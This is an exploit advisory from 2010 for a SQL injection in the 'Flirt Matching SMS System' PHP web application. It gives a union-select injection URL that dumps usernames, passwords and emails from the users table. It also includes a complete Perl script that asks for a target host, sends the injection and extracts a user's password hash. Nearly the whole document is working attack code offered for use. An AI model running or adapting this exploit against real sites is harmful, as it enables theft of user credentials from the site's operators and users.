Flirt Matching SMS System SQL Injection

`----------------------------Information------------------------------------------------  
+Name : Flirt Matching SMS System <= SQL Injection Exploit  
+Autor : Easy Laster  
+Date : 26.03.2010  
+Script : Flirt Matching SMS System  
+Download : ------------------  
+Demo : http://phpspezial.de/singel/  
+Price : 39,99€  
+Language :PHP  
+Discovered by Easy Laster  
+Security Group 4004-Security-Project  
+Greetz to Team-Internet ,Underground Agents  
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,  
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,  
N00bor,Ic3Drag0n,novaca!ne.  
  
---------------------------------------------------------------------------------------  
  
___ ___ ___ ___ _ _ _____ _ _   
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_  
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|  
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|   
|___| |___|   
  
  
----------------------------------------------------------------------------------------  
+Vulnerability : http://www.site.com/flirt/index.php?site=guestbook&id=  
  
+Exploitable : http://www.site.com/flirt/index.php?site=guestbook&id=9999999999+union  
+select+1,2,3,4,concat(id,0x3a,username,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14,  
15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from  
+users+where+id=1  
  
-----------------------------------------------------------------------------------------  
  
#SQL Injection Exploit  
  
#!usr\bin\perl  
#  
#  
##################################################  
# Modules #  
#------------------------------------------------#   
use strict; # Better coding. #  
use warnings; # Useful warnings. #  
use LWP::Simple; # procedureal interface#  
##################################################  
print "  
##################################################  
# 4004-Security-Project #  
##################################################  
# Flirt Matching SMS System SQL Injection #  
# Exploit #  
# Using Host+Path+Userid #  
# www.demo.com /flirt/ 1 #  
# Discovered and vulnerability by Easy Laster #  
# coded by Easy Laster #  
##################################################  
\a\n";  
my($host,$path,$userid,$request);  
my($first,$block,$error,$dir);  
$block = "  
##################################################\n";  
$error = "Exploit failed";  
print "$block";  
print q(Target www.demo.com->);  
chomp($host =<STDIN>);  
if ($host eq""){  
die "$error\a\n"};  
print "$block";  
print q(Path /path/ ->);  
chomp($path =<STDIN>);  
if ($path eq""){  
die "$error\a\n";}  
print "$block";  
print q(userid->);  
chomp($userid =<STDIN>);  
if ($userid eq""){  
die "$error\a\n";}  
print "$block";  
$dir = "index.php?site=guestbook&id=";  
print "<~> Exploiting...\n";  
$host = "http://".$host.$path;  
print "<~> Connecting...\n";  
$request = get($host.$dir."9999999999+union+select+1,2,3,4,concat(password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+where+id=".$userid."--");  
$first = rindex($request,"Gästebuch von");  
if ($first != -1)  
{  
print "<~> Exploiting...\n";  
print "$block\n";  
$request = substr($request, $first+14, 34);  
print "<~> Hash = $request\n\r\n\a";  
}  
else  
{  
print "<~> $error";  
}  
  
`